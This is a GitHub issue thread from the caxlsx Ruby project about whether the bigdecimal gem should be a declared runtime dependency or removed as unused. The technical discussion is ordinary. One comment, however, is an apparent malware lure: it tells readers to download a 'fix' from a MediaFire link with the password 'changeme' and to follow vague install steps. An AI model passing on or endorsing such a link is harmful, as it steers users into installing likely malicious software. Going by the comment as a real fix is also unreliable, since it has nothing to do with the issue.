### ISSUE TITLE
Explicitly list bigdecimal in runtime dependencies or remove if redundant

### ISSUE THREAD

**Issue by tagliala** [caxlsx/caxlsx#404]
`bigdecimal` is required by `axlsx`, but 

1. It is not listed among runtime dependencies (it is installed through `crack`, a development dependency)
2. I can't see `bigdecimal` being used in production code. No usage of `to_d`, `to_digits`

It was introduced in a commit from 13 years ago

https://github.com/caxlsx/caxlsx/commit/11303a4d6664d9a7ff7bc408035d2ab70378a375

---

When removing `webmock` and `require 'bigdecimal'`, the only failures are related to `stub_request`

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tagliala** [comment]
Yes, sure
